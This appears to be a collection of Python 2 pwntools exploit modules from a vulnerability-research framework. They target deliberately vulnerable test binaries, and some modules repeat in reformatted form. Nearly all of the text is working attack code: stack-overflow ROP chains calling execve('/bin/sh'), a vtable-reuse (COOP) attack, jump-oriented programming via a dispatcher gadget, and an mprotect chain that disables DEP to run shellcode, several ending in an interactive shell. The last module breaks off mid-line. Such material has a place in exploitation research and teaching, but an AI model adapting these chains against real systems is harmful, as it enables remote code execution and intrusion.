def run(self): if self.options['architecture'] == 'amd64': if self.options['static'] == 'False': '''Run your exploit here, if this script could success, the VRL can run it. When the exploit run, follow the options.''' # s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #s.connect((self.options['dIP'], int(self.options['port']))) p = remote(self.options['dIP'], int(self.options['port'])) #p = process('../../vulnerabilities/coop/coop') a = raw_input('input: ') #set /bin/sh ASCII binsh = p32(0x6e69622f) + p32(0x0068732f) + p32(0x74697865) + p32(0x63003020) + p32(0x6e6f6e61) + p32(0x6c616369) #set payload temppayload = "b"*2 #s.send(temppayload) p.sendline(temppayload) payload = binsh + p64(self.property['courseMLoopVptr']) + p64(self.property['studentsptr']) + p64(self.property['nstudent']) + p64(self.property['studentptr0']) + p64(self.property['studentptr1']) + p64(self.property['studentptr3']) + p64(self.property['studentptr2']) + p64(self.property['coursePrintfSystemVptr']) + p64(self.property['studentReadString']) + p64(self.property['examSumScore']) + p64(self.property['scoreA']) + p64(self.property['scoreB']) + p64(self.property['scoreC']) + p64(self.property['buibuttonClicked']) + p64(self.property['sysaddress']) #s.send(payload) p.sendline(payload) #get new sysaddress here #recv_data = s.recv(16) recv_data = p.recvline() self.property['sysaddress'] = int(recv_data,16) print "sysaddress = " + hex(self.property['sysaddress']) libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') #get /bin/sh offset binsh_addr_offset = next(libc.search('/bin/sh')) -libc.symbols['system'] print "binsh_addr_offset = " + hex(binsh_addr_offset) #get /bin/sh address binsh_addr = self.property['sysaddress'] + binsh_addr_offset print "binsh_addr = " + hex(binsh_addr) #set payload payload = p64(self.property['examSumScore']) + p64(self.property['scoreA']) + p64(self.property['scoreB']) + p64(self.property['scoreC']) + p64(self.property['buibuttonClicked']) + p64(binsh_addr) + p64(self.property['sysaddress']) #s.send(payload) p.sendline(payload) print 'interactive' #s.close() p.interactive() else: print 'static' elif self.options['architecture'] == 'i386': if self.options['static'] == 'False': print 'dl' else: print 'static' else: print 'Unrecognized architecture, stop.' return
def run(self): if self.options['static'] == 'False': '''Run your exploit here, if this script could success, the VRL can run it. When the exploit run, follow the options.''' s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((self.options['dIP'], int(self.options['port']))) #get new sysaddress here s.send("a") #any string recv_data = s.recv(16) self.property['sysaddress'] = int(recv_data,16) libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') #get /bin/sh offset print "sysaddress = " + hex(self.property['sysaddress']) binsh_addr_offset = next(libc.search('/bin/sh')) -libc.symbols['system'] print "binsh_addr_offset = " + hex(binsh_addr_offset) #get ret offset pop_ret_offset = self.property['ret'] - libc.symbols['system'] print "pop_ret_offset = " + hex(pop_ret_offset) #get /bin/sh address binsh_addr = self.property['sysaddress'] + binsh_addr_offset #get ret address pop_ret_addr = self.property['sysaddress'] + pop_ret_offset payload = "a"*self.property['offset'] + p64(pop_ret_addr) + p64(binsh_addr) + p64(self.property['sysaddress']) print "\n##########sending payload##########\n" s.send(payload) s.close() #p.interactive() else: '''Run your exploit here, if this script could success, the VRL can run it. When the exploit run, follow the options.''' self.property = {'ret':0x0000000000401696, #gadget address in exe 'offset':24, #offset 'sysaddress':0x0} # system function address, initialize 0 self.vulnerability= 'vulnerabilities/stack_overflow/ggteststatic' s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((self.options['dIP'], int(self.options['port']))) libc = ELF('../../vulnerabilities/stack_overflow/ggteststatic') self.property['sysaddress'] = libc.symbols['system'] print "sysaddress = " + hex(self.property['sysaddress']) #get /bin/sh address binsh_addr = next(libc.search('/bin/sh')) #get ret address pop_ret_addr = self.property['ret'] payload = "a"*self.property['offset'] + p64(pop_ret_addr) + p64(binsh_addr) + p64(self.property['sysaddress']) print "\n##########sending payload##########\n" s.send(payload) s.close()
def run(self): if self.options['architecture'] == 'amd64': if self.options['static'] == 'False': '''Run your exploit here, if this script could success, the VRL can run it. When the exploit run, follow the options.''' p = remote(self.options['dIP'], int(self.options['port'])) #a = raw_input('input: ') #set /bin/sh ASCII binsh = p32(0x6e69622f) + p32(0x0068732f) #set payload payload = 'a'*(self.property['offset']-8) + binsh + p32(self.property['limit']) + p32(self.property['choose']) + p64(self.property['p']) + p64(self.property['q']) #send payload p.sendline(payload) #recv recv_data = p.recv() print 'rev1: ' + recv_data #set payload payload = 'a'*(self.property['offset']-8) + binsh + p32(self.property['limit']) + p32(self.property['choose']) #send payload p.sendline(payload) #recv get new sysaddress here recv_data = p.recvline() print 'rev2: ' + recv_data self.property['sysaddress'] = int(recv_data,16) print "sysaddress = " + hex(self.property['sysaddress']) libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') #get /bin/sh offset binsh_addr_offset = next(libc.search('/bin/sh')) -libc.symbols['system'] print "binsh_addr_offset = " + hex(binsh_addr_offset) #get /bin/sh address binsh_addr = self.property['sysaddress'] + binsh_addr_offset print "binsh_addr = " + hex(binsh_addr) #set payload self.property['choose'] = 2 self.property['p'] = 0x601098 self.property['q'] = 0x7fffffffdc78 payload = 'a'*(self.property['offset']-8)+ p64(self.property['sysaddress']) + p32(self.property['limit']) + p32(self.property['choose']) + p64(self.property['p']) + p64(self.property['q']) #send payload p.sendline(payload) #recv recv_data = p.recvline() print 'rev3: ' + recv_data #set payload self.property['choose'] = 2 self.property['p'] = 0x60109c self.property['q'] = 0x7fffffffdc7c payload = 'a'*(self.property['offset']-8)+ p64(self.property['sysaddress']) + p32(self.property['limit']) + p32(self.property['choose']) + p64(self.property['p']) + p64(self.property['q']) #send payload p.sendline(payload) #recv recv_data = p.recvline() print 'rev4: ' + recv_data #set payload self.property['limit'] = 0 self.property['choose'] = 3 self.property['p'] = 0x601070 self.property['q'] = 0x601078 payload = binsh + 'a'*(self.property['offset']-8) + p32(self.property['limit']) + p32(self.property['choose']) + p64(self.property['p']) + p64(self.property['q']) #send payload p.sendline(payload) print 'interactive' p.interactive() else: print 'static' elif self.options['architecture'] == 'i386': if self.options['static'] == 'False': print 'dl' else: print 'static' else: print 'Unrecognized architecture, stop.' return
def run(self): '''Run your exploit here, if this script could success, the VRL can run it. When the exploit run, follow the options.''' if self.options['architecture'] == 'amd64': if self.options['static'] == 'False': self.property = {'ret1': 0x0000000000021102, # gadget address in libc 'ret2': 0x000000000008ae95, 'ret3': 0x000000000003a718, 'ret4': 0x0000000000114809, 'ret5': 0x00000000000bb945, 'data1': 0x000000000000003b, # execv systemcall number 'data2': 0x0000000000000000, 'data3': 0x0000000000000000, 'offset': 40, # offset 'sysaddress': 0x0} # system function address, initialize 0 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((self.options['dIP'], int(self.options['port']))) # get new sysaddress here s.send("a") # any string recv_data = s.recv(16) self.property['sysaddress'] = int(recv_data, 16) libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') print "sysaddress = " + hex(self.property['sysaddress']) # get /bin/sh offset binsh_addr_offset = next(libc.search('/bin/sh')) - libc.symbols['system'] print "binsh_addr_offset = " + hex(binsh_addr_offset) # get ret offset pop_ret1_offset = self.property['ret1'] - libc.symbols['system'] pop_ret2_offset = self.property['ret2'] - libc.symbols['system'] pop_ret3_offset = self.property['ret3'] - libc.symbols['system'] pop_ret4_offset = self.property['ret4'] - libc.symbols['system'] pop_ret5_offset = self.property['ret5'] - libc.symbols['system'] # get /bin/sh address binsh_addr = self.property['sysaddress'] + binsh_addr_offset # get ret address pop_ret1_addr = self.property['sysaddress'] + pop_ret1_offset pop_ret2_addr = self.property['sysaddress'] + pop_ret2_offset pop_ret3_addr = self.property['sysaddress'] + pop_ret3_offset pop_ret4_addr = self.property['sysaddress'] + pop_ret4_offset pop_ret5_addr = self.property['sysaddress'] + pop_ret5_offset # pop_ret5_addr =pop_ret4_addr - 2 # set payload payload = "a" * self.property['offset'] + p64(pop_ret1_addr) + p64(binsh_addr) + p64( pop_ret2_addr) + p64(pop_ret3_addr) + p64(self.property['data1']) + p64(pop_ret4_addr) + p64( self.property['data2']) + p64(self.property['data3']) + p64(pop_ret5_addr) print "\n##########sending payload##########\n" s.send(payload) s.close() else: self.property = {'ret1': 0x0000000000401696, # gadget address in libc 'ret2': 0x00000000004264af, 'ret3': 0x00000000004c26e8, 'ret4': 0x0000000000442fe9, 'ret5': 0x0000000000467685, 'data1': 0x000000000000003b, # execv systemcall number 'data2': 0x0000000000000000, 'data3': 0x0000000000000000, 'offset': 24, # offset 'sysaddress': 0x0} # system function address, initialize 0 self.vulnerability = 'vulnerabilities/stack_overflow/ggteststatic' s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((self.options['dIP'], int(self.options['port']))) libc = ELF('../../vulnerabilities/stack_overflow/ggteststatic') # get sysaddress here self.property['sysaddress'] = libc.symbols['system'] print "sysaddress = " + hex(self.property['sysaddress']) # get /bin/sh address binsh_addr = next(libc.search('/bin/sh')) # get ret address pop_ret1_addr = self.property['ret1'] pop_ret2_addr = self.property['ret2'] pop_ret3_addr = self.property['ret3'] pop_ret4_addr = self.property['ret4'] pop_ret5_addr = self.property['ret5'] # set payload payload = "a" * self.property['offset'] + p64(pop_ret1_addr) + p64(binsh_addr) + p64( pop_ret2_addr) + p64(pop_ret3_addr) + p64(self.property['data1']) + p64(pop_ret4_addr) + p64( self.property['data2']) + p64(self.property['data3']) + p64(pop_ret5_addr) print "\n##########sending payload##########\n" s.send(payload) s.close() elif self.options['architecture'] == 'i386': if self.options['static'] == 'False': self.property = {'ret1': 0x00018395, # gadget address in libc : pop ebx ; ret 'ret2': 0x0002c5dc, # : xor eax, eax ; ret 'ret3': 0x00023f97, # : pop eax ; ret 'ret4': 0x0002baab, # : pop ecx ; pop edx ; ret 'ret5': 0x00002c87, # : int 0x80 'data1': 0x0000000b, # execv systemcall number 'data2': 0x00000000, 'data3': 0x00000000, 'offset': 26, # offset 'sysaddress': 0x0} # system function address, initialize 0 '''Run your exploit here, if this script could success, the VRL can run it. When the exploit run, follow the options.''' s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((self.options['dIP'], int(self.options['port']))) # get new sysaddress here s.send("a") # any string recv_data = s.recv(8) self.property['sysaddress'] = int(recv_data, 16) libc = ELF('/lib32/libc.so.6') print "sysaddress = " + hex(self.property['sysaddress']) # get /bin/sh offset binsh_addr_offset = next(libc.search('/bin/sh')) - libc.symbols['system'] print "binsh_addr_offset = " + hex(binsh_addr_offset) # get ret offset pop_ret1_offset = self.property['ret1'] - libc.symbols['system'] pop_ret2_offset = self.property['ret2'] - libc.symbols['system'] pop_ret3_offset = self.property['ret3'] - libc.symbols['system'] pop_ret4_offset = self.property['ret4'] - libc.symbols['system'] pop_ret5_offset = self.property['ret5'] - libc.symbols['system'] # get /bin/sh address binsh_addr = self.property['sysaddress'] + binsh_addr_offset # get ret address pop_ret1_addr = self.property['sysaddress'] + pop_ret1_offset pop_ret2_addr = self.property['sysaddress'] + pop_ret2_offset pop_ret3_addr = self.property['sysaddress'] + pop_ret3_offset pop_ret4_addr = self.property['sysaddress'] + pop_ret4_offset pop_ret5_addr = self.property['sysaddress'] + pop_ret5_offset # pop_ret5_addr =pop_ret4_addr - 2 # set payload payload = "a" * self.property['offset'] + p32(pop_ret1_addr) + p32(binsh_addr) + p32( pop_ret2_addr) + p32(pop_ret3_addr) + p32(self.property['data1']) + p32(pop_ret4_addr) + p32( self.property['data2']) + p32(self.property['data3']) + p32(pop_ret5_addr) print "\n##########sending payload##########\n" s.send(payload) s.close() else: print "Not supported: i386 & static." else: print 'Unrecognized architecture, stop.' return
def run(self): if self.options['architecture'] == 'amd64': if self.options['static'] == 'False': '''Run your exploit here, if this script could success, the VRL can run it. When the exploit run, follow the options.''' p = remote(self.options['dIP'], int(self.options['port'])) #a = raw_input('input: ') #set /bin/sh ASCII binsh = p32(0x6e69622f) + p32(0x0068732f) #set payload payload = 'a' * (self.property['offset'] - 8) + binsh + p32( self.property['limit']) + p32( self.property['choose']) + p64( self.property['p']) + p64(self.property['q']) #send payload p.sendline(payload) #recv recv_data = p.recv() print 'rev1: ' + recv_data #set payload payload = 'a' * (self.property['offset'] - 8) + binsh + p32( self.property['limit']) + p32(self.property['choose']) #send payload p.sendline(payload) #recv get new sysaddress here recv_data = p.recvline() print 'rev2: ' + recv_data self.property['sysaddress'] = int(recv_data, 16) print "sysaddress = " + hex(self.property['sysaddress']) libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') #get /bin/sh offset binsh_addr_offset = next( libc.search('/bin/sh')) - libc.symbols['system'] print "binsh_addr_offset = " + hex(binsh_addr_offset) #get /bin/sh address binsh_addr = self.property['sysaddress'] + binsh_addr_offset print "binsh_addr = " + hex(binsh_addr) #set payload self.property['choose'] = 2 self.property['p'] = 0x601098 self.property['q'] = 0x7fffffffdc78 payload = 'a' * (self.property['offset'] - 8) + p64( self.property['sysaddress']) + p32( self.property['limit']) + p32( self.property['choose']) + p64( self.property['p']) + p64(self.property['q']) #send payload p.sendline(payload) #recv recv_data = p.recvline() print 'rev3: ' + recv_data #set payload self.property['choose'] = 2 self.property['p'] = 0x60109c self.property['q'] = 0x7fffffffdc7c payload = 'a' * (self.property['offset'] - 8) + p64( self.property['sysaddress']) + p32( self.property['limit']) + p32( self.property['choose']) + p64( self.property['p']) + p64(self.property['q']) #send payload p.sendline(payload) #recv recv_data = p.recvline() print 'rev4: ' + recv_data #set payload self.property['limit'] = 0 self.property['choose'] = 3 self.property['p'] = 0x601070 self.property['q'] = 0x601078 payload = binsh + 'a' * (self.property['offset'] - 8) + p32( self.property['limit']) + p32( self.property['choose']) + p64( self.property['p']) + p64(self.property['q']) #send payload p.sendline(payload) print 'interactive' p.interactive() else: print 'static' elif self.options['architecture'] == 'i386': if self.options['static'] == 'False': print 'dl' else: print 'static' else: print 'Unrecognized architecture, stop.' return
def run(self): if self.options['static'] == 'False': '''Run your exploit here, if this script could success, the VRL can run it. When the exploit run, follow the options.''' s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((self.options['dIP'], int(self.options['port']))) #get new sysaddress here s.send("a") #any string recv_data = s.recv(16) self.property['sysaddress'] = int(recv_data, 16) libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') #get /bin/sh offset print "sysaddress = " + hex(self.property['sysaddress']) binsh_addr_offset = next( libc.search('/bin/sh')) - libc.symbols['system'] print "binsh_addr_offset = " + hex(binsh_addr_offset) #get ret offset pop_ret_offset = self.property['ret'] - libc.symbols['system'] print "pop_ret_offset = " + hex(pop_ret_offset) #get /bin/sh address binsh_addr = self.property['sysaddress'] + binsh_addr_offset #get ret address pop_ret_addr = self.property['sysaddress'] + pop_ret_offset payload = "a" * self.property['offset'] + p64(pop_ret_addr) + p64( binsh_addr) + p64(self.property['sysaddress']) print "\n##########sending payload##########\n" s.send(payload) s.close() #p.interactive() else: '''Run your exploit here, if this script could success, the VRL can run it. When the exploit run, follow the options.''' self.property = { 'ret': 0x0000000000401696, #gadget address in exe 'offset': 24, #offset 'sysaddress': 0x0 } # system function address, initialize 0 self.vulnerability = 'vulnerabilities/stack_overflow/ggteststatic' s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((self.options['dIP'], int(self.options['port']))) libc = ELF('../../vulnerabilities/stack_overflow/ggteststatic') self.property['sysaddress'] = libc.symbols['system'] print "sysaddress = " + hex(self.property['sysaddress']) #get /bin/sh address binsh_addr = next(libc.search('/bin/sh')) #get ret address pop_ret_addr = self.property['ret'] payload = "a" * self.property['offset'] + p64(pop_ret_addr) + p64( binsh_addr) + p64(self.property['sysaddress']) print "\n##########sending payload##########\n" s.send(payload) s.close()
def run(self): if self.options['static'] == 'False': '''Run your exploit here, if this script could success, the VRL can run it. When the exploit run, follow the options.''' s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((self.options['dIP'], int(self.options['port']))) #get new sysaddress here s.send('a') recv_data = s.recv(16) self.property['sysaddress'] = int(recv_data,16) libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') print "sysaddress = " + hex(self.property['sysaddress']) #get rbp s.send('b') recv_data1 = s.recv(16) self.property['gadgetaddr'] = int(recv_data1,16) print "gadgetaddr = " + hex(self.property['gadgetaddr']) gadgetaddr=self.property['gadgetaddr'] + 72 #get /bin/sh offset binsh_addr_offset = next(libc.search('/bin/sh')) -libc.symbols['system'] print "binsh_addr_offset = " + hex(binsh_addr_offset) #get jmp offset pop_jmp1_offset = self.property['jmp1'] - libc.symbols['system'] pop_jmp2_offset = self.property['jmp2'] - libc.symbols['system'] pop_jmp3_offset = self.property['jmp3'] - libc.symbols['system'] pop_jmp4_offset = self.property['jmp4'] - libc.symbols['system'] pop_jmp5_offset = self.property['jmp5'] - libc.symbols['system'] pop_jmp6_offset = self.property['jmp6'] - libc.symbols['system'] print "pop_jmp1_offset = " + hex(pop_jmp1_offset) #get /bin/sh address binsh_addr = self.property['sysaddress'] + binsh_addr_offset #get jmp address pop_jmp1_addr = self.property['sysaddress'] + pop_jmp1_offset pop_jmp2_addr = self.property['sysaddress'] + pop_jmp2_offset pop_jmp3_addr = self.property['sysaddress'] + pop_jmp3_offset pop_jmp4_addr = self.property['sysaddress'] + pop_jmp4_offset pop_jmp5_addr = self.property['sysaddress'] + pop_jmp5_offset pop_jmp52_addr = self.property['sysaddress'] + pop_jmp5_offset pop_jmp6_addr = self.property['sysaddress'] + pop_jmp6_offset print "pop_jmp1_addr = " + hex(pop_jmp1_addr) #set payload payload = "a"*self.property['offset'] + p64(self.property['ret']) + p64(self.property['dispatcherAddr']) + p64(self.property['dispatcherAddr']) + p64(gadgetaddr) + p64(binsh_addr) + p64(self.property['data1']) + p64(self.property['data1']) + p64(self.property['data1']) + p64(self.property['data2']) + p64(pop_jmp1_addr) + p64(pop_jmp2_addr) + p64(pop_jmp3_addr) + p64(pop_jmp4_addr) + p64(pop_jmp5_addr) + p64(pop_jmp52_addr) + p64(pop_jmp6_addr) print "\n##########sending payload##########\n" s.send(payload) s.close() else: self.property = {'ret':0x00000000004009d9, #initialize register address 'dispatcherAddr':0x00000000004009dc,# dispatcher gadget address 'gadgetaddr':0x0,#the address of first gadget address in stack, initialize 0 'data1':0x0000000000000000, 'data2':0x000000000000003b,#execv systemcall number 'jmp1':0x00000000004738cd,#functional gadget address in libc 'jmp2':0x000000000047e7a0, 'jmp3':0x0000000000441cb2, 'jmp4':0x0000000000441cb2, 'jmp5':0x00000000004009e2, 'jmp6':0x0000000000467685, 'offset':24, # offset 'sysaddress':0x0} # system function address, initialize 0 self.vulnerability= 'vulnerabilities/stack_overflow/ggteststatic' s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((self.options['dIP'], int(self.options['port']))) libc = ELF('../../vulnerabilities/stack_overflow/ggteststatic') #get sysaddress here self.property['sysaddress'] = libc.symbols['system'] print "sysaddress = " + hex(self.property['sysaddress']) #get rbp s.send('b') recv_data1 = s.recv(16) self.property['gadgetaddr'] = int(recv_data1,16) print "gadgetaddr = " + hex(self.property['gadgetaddr']) gadgetaddr=self.property['gadgetaddr'] + 64 #get /bin/sh address binsh_addr = next(libc.search('/bin/sh')) #get jmp offset pop_jmp1_addr = self.property['jmp1'] pop_jmp2_addr = self.property['jmp2'] pop_jmp3_addr = self.property['jmp3'] pop_jmp4_addr = self.property['jmp4'] pop_jmp5_addr = self.property['jmp5'] pop_jmp6_addr = self.property['jmp6'] #set payload payload = "a"*self.property['offset'] + p64(self.property['ret']) + p64(self.property['dispatcherAddr']) + p64(self.property['dispatcherAddr']) + p64(gadgetaddr) + p64(self.property['data1']) + p64(self.property['data1']) + p64(binsh_addr) + p64(self.property['data2']) + p64(pop_jmp1_addr) + p64(pop_jmp2_addr) + p64(pop_jmp3_addr) + p64(pop_jmp4_addr) + p64(pop_jmp5_addr) + p64(pop_jmp6_addr) print "\n##########sending payload##########\n" s.send(payload) s.close()
def run(self): if self.options['static'] == 'False': '''Run your exploit here, if this script could success, the VRL can run it. When the exploit run, follow the options.''' s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((self.options['dIP'], int(self.options['port']))) #get new sysaddress here s.send('a') recv_data = s.recv(16) self.property['sysaddress'] = int(recv_data, 16) libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') print "sysaddress = " + hex(self.property['sysaddress']) #get rbp s.send('b') recv_data1 = s.recv(16) self.property['gadgetaddr'] = int(recv_data1, 16) print "gadgetaddr = " + hex(self.property['gadgetaddr']) gadgetaddr = self.property['gadgetaddr'] + 72 #get /bin/sh offset binsh_addr_offset = next( libc.search('/bin/sh')) - libc.symbols['system'] print "binsh_addr_offset = " + hex(binsh_addr_offset) #get jmp offset pop_jmp1_offset = self.property['jmp1'] - libc.symbols['system'] pop_jmp2_offset = self.property['jmp2'] - libc.symbols['system'] pop_jmp3_offset = self.property['jmp3'] - libc.symbols['system'] pop_jmp4_offset = self.property['jmp4'] - libc.symbols['system'] pop_jmp5_offset = self.property['jmp5'] - libc.symbols['system'] pop_jmp6_offset = self.property['jmp6'] - libc.symbols['system'] print "pop_jmp1_offset = " + hex(pop_jmp1_offset) #get /bin/sh address binsh_addr = self.property['sysaddress'] + binsh_addr_offset #get jmp address pop_jmp1_addr = self.property['sysaddress'] + pop_jmp1_offset pop_jmp2_addr = self.property['sysaddress'] + pop_jmp2_offset pop_jmp3_addr = self.property['sysaddress'] + pop_jmp3_offset pop_jmp4_addr = self.property['sysaddress'] + pop_jmp4_offset pop_jmp5_addr = self.property['sysaddress'] + pop_jmp5_offset pop_jmp52_addr = self.property['sysaddress'] + pop_jmp5_offset pop_jmp6_addr = self.property['sysaddress'] + pop_jmp6_offset print "pop_jmp1_addr = " + hex(pop_jmp1_addr) #set payload payload = "a" * self.property['offset'] + p64( self.property['ret'] ) + p64(self.property['dispatcherAddr']) + p64( self.property['dispatcherAddr'] ) + p64(gadgetaddr) + p64(binsh_addr) + p64( self.property['data1']) + p64(self.property['data1']) + p64( self.property['data1']) + p64( self.property['data2']) + p64(pop_jmp1_addr) + p64( pop_jmp2_addr) + p64(pop_jmp3_addr) + p64( pop_jmp4_addr) + p64(pop_jmp5_addr) + p64( pop_jmp52_addr) + p64(pop_jmp6_addr) print "\n##########sending payload##########\n" s.send(payload) s.close() else: self.property = { 'ret': 0x00000000004009d9, #initialize register address 'dispatcherAddr': 0x00000000004009dc, # dispatcher gadget address 'gadgetaddr': 0x0, #the address of first gadget address in stack, initialize 0 'data1': 0x0000000000000000, 'data2': 0x000000000000003b, #execv systemcall number 'jmp1': 0x00000000004738cd, #functional gadget address in libc 'jmp2': 0x000000000047e7a0, 'jmp3': 0x0000000000441cb2, 'jmp4': 0x0000000000441cb2, 'jmp5': 0x00000000004009e2, 'jmp6': 0x0000000000467685, 'offset': 24, # offset 'sysaddress': 0x0 } # system function address, initialize 0 self.vulnerability = 'vulnerabilities/stack_overflow/ggteststatic' s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((self.options['dIP'], int(self.options['port']))) libc = ELF('../../vulnerabilities/stack_overflow/ggteststatic') #get sysaddress here self.property['sysaddress'] = libc.symbols['system'] print "sysaddress = " + hex(self.property['sysaddress']) #get rbp s.send('b') recv_data1 = s.recv(16) self.property['gadgetaddr'] = int(recv_data1, 16) print "gadgetaddr = " + hex(self.property['gadgetaddr']) gadgetaddr = self.property['gadgetaddr'] + 64 #get /bin/sh address binsh_addr = next(libc.search('/bin/sh')) #get jmp offset pop_jmp1_addr = self.property['jmp1'] pop_jmp2_addr = self.property['jmp2'] pop_jmp3_addr = self.property['jmp3'] pop_jmp4_addr = self.property['jmp4'] pop_jmp5_addr = self.property['jmp5'] pop_jmp6_addr = self.property['jmp6'] #set payload payload = "a" * self.property['offset'] + p64( self.property['ret'] ) + p64(self.property['dispatcherAddr']) + p64( self.property['dispatcherAddr']) + p64(gadgetaddr) + p64( self.property['data1']) + p64( self.property['data1']) + p64(binsh_addr) + p64( self.property['data2']) + p64(pop_jmp1_addr) + p64( pop_jmp2_addr) + p64(pop_jmp3_addr) + p64( pop_jmp4_addr) + p64(pop_jmp5_addr) + p64( pop_jmp6_addr) print "\n##########sending payload##########\n" s.send(payload) s.close()
def run(self): if self.options['static'] == 'False': '''Run your exploit here, if this script could success, the VRL can run it. When the exploit run, follow the options.''' s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((self.options['dIP'], int(self.options['port']))) #get new sysaddress here s.send('a') recv_data = s.recv(16) self.property['sysaddress'] = int(recv_data,16) libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') print "sysaddress = " + hex(self.property['sysaddress']) #get rbp s.send('b') recv_data1 = s.recv(16) rbpvalue= int(recv_data1,16) print "rbpvalue = " + hex(rbpvalue) #get shellcode address self.property['shellcodeaddress'] = rbpvalue + 112 #get /bin/sh offset binsh_addr_offset = next(libc.search('/bin/sh')) -libc.symbols['system'] print "binsh_addr_offset = " + hex(binsh_addr_offset) #get ret offset pop_ret1_offset = self.property['ret1'] - libc.symbols['system'] pop_ret2_offset = self.property['ret2'] - libc.symbols['system'] pop_ret3_offset = self.property['ret3'] - libc.symbols['system'] pop_ret4_offset = self.property['ret4'] - libc.symbols['system'] #get /bin/sh address binsh_addr = self.property['sysaddress'] + binsh_addr_offset #get ret address pop_ret1_addr = self.property['sysaddress'] + pop_ret1_offset pop_ret2_addr = self.property['sysaddress'] + pop_ret2_offset pop_ret3_addr = self.property['sysaddress'] + pop_ret3_offset pop_ret4_addr = self.property['sysaddress'] + pop_ret4_offset pagenum=self.property['data2'] * 3 print pagenum #print helloworld shellcode="\xeb\x1e\x5e\x48\x31\xc0\xb0\x01" shellcode +="\x48\x89\xc7\x48\x89\xfa\x48\x83" shellcode +="\xc2\x0e\x0f\x05\x48\x31\xc0\x48" shellcode +="\x83\xc0\x3c\x48\x31\xff\x0f\x05" shellcode +="\xe8\xdd\xff\xff\xff\x48\x65\x6c" shellcode +="\x6c\x6f\x2c\x20\x77\x6f\x72\x6c\x64\x21\x0a" #shell shellcode="\x5f\x48\x31\xc0\x58\x5a\x5e\x0f\x05" #set payload rop shut off dep payload = "a"*self.property['offset'] + p64(pop_ret1_addr) + p64(self.property['pageaddress']) + p64(pop_ret2_addr) + p64(self.property['data1']) + p64(pagenum) + p64(pop_ret3_addr) + p64(self.property['data3']) + p64(pop_ret4_addr) + p64(self.property['shellcodeaddress']) + p64(binsh_addr) + p64(self.property['data4']) + p64(self.property['data5']) + p64(self.property['data5']) + self.payload print "\n##########sending payload to shut off dep ##########\n" s.send(payload) s.close() else: self.property = {'ret1':0x0000000000401696, #gadget address 'ret2':0x0000000000442fe9 , 'ret3':0x00000000004c26e8 , 'ret4':0x0000000000467685 , 'pageaddress':0x7fffffffd000, 'shellcodeaddress':0x0,#shellcode address in stack 'data1':0x0000000000000007,# PROT_EXEC The memory can be executed. 'data2':0x0000000000001000,# 4096 pagesize 'data3':0x000000000000000a, #mprotect systemcall number, mprotect() changes protection for the calling process's memory page(s) 'data4':0x000000000000003b,#execv systemcall number 'data5':0x0000000000000000, 'offset':24, # offset 'sysaddress':0x0} # system function address, initialize 0 self.vulnerability= 'vulnerabilities/stack_overflow/ggteststatic' s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((self.options['dIP'], int(self.options['port']))) libc = ELF('../../vulnerabilities/stack_overflow/ggteststatic_stacknoexe') #get sysaddress here self.property['sysaddress'] = libc.symbols['system'] print "sysaddress = " + hex(self.property['sysaddress']) #get rbp s.send('b') recv_data1 = s.recv(16) rbpvalue= int(recv_data1,16) print "rbpvalue = " + hex(rbpvalue) #get shellcode address self.property['shellcodeaddress'] = rbpvalue + 112 #get /bin/sh address binsh_addr = next(libc.search('/bin/sh')) #get ret offset pop_ret1_addr = self.property['ret1'] pop_ret2_addr = self.property['ret2'] pop_ret3_addr = self.property['ret3'] pop_ret4_addr = self.property['ret4'] pagenum=self.property['data2'] * 3 print pagenum #print helloworld shellcode="\xeb\x1e\x5e\x48\x31\xc0\xb0\x01" shellcode +="\x48\x89\xc7\x48\x89\xfa\x48\x83" shellcode +="\xc2\x0e\x0f\x05\x48\x31\xc0\x48" shellcode +="\x83\xc0\x3c\x48\x31\xff\x0f\x05" shellcode +="\xe8\xdd\xff\xff\xff\x48\x65\x6c" shellcode +="\x6c\x6f\x2c\x20\x77\x6f\x72\x6c\x64\x21\x0a" #shell #shellcode="\x5f\x48\x31\xc0\x58\x5a\x5e\x0f\x05" #set payload rop shut off dep payload = "a"*self.property['offset'] + p64(pop_ret1_addr) + p64(self.property['pageaddress']) + p64(pop_ret2_addr) + p64(self.property['data1']) + p64(pagenum) + p64(pop_ret3_addr) + p64(self.property['data3']) + p64(pop_ret4_addr) + p64(self.property['shellcodeaddress']) + p64(binsh_addr) + p64(self.property['data4']) + p64(self.property['data5']) + p64(self.property['data5']) + shellcode print "\n##########sending payload to shut off dep ##########\n" s.send(payload) s.close()
def run(self): if self.options['architecture'] == 'amd64': if self.options['static'] == 'False': '''Run your exploit here, if this script could success, the VRL can run it. When the exploit run, follow the options.''' s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((self.options['dIP'], int(self.options['port']))) self.property = {'ret1': 0x0000000000021102, # gadget address in libc 'ret2': 0x000000000008ae95, 'ret3': 0x000000000003a718, 'ret4': 0x0000000000114809, 'ret5': 0x00000000000bb945, 'data1': 0x000000000000003b, # execv systemcall number 'data2': 0x0000000000000000, 'data3': 0x0000000000000000, 'offset': 40, # offset 'sysaddress': 0x0} # system function address, initialize 0 # get new sysaddress here s.send("a") # any string recv_data = s.recv(16) self.property['sysaddress'] = int(recv_data, 16) libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') print "sysaddress = " + hex(self.property['sysaddress']) # get /bin/sh offset binsh_addr_offset = next(libc.search('/bin/sh')) - 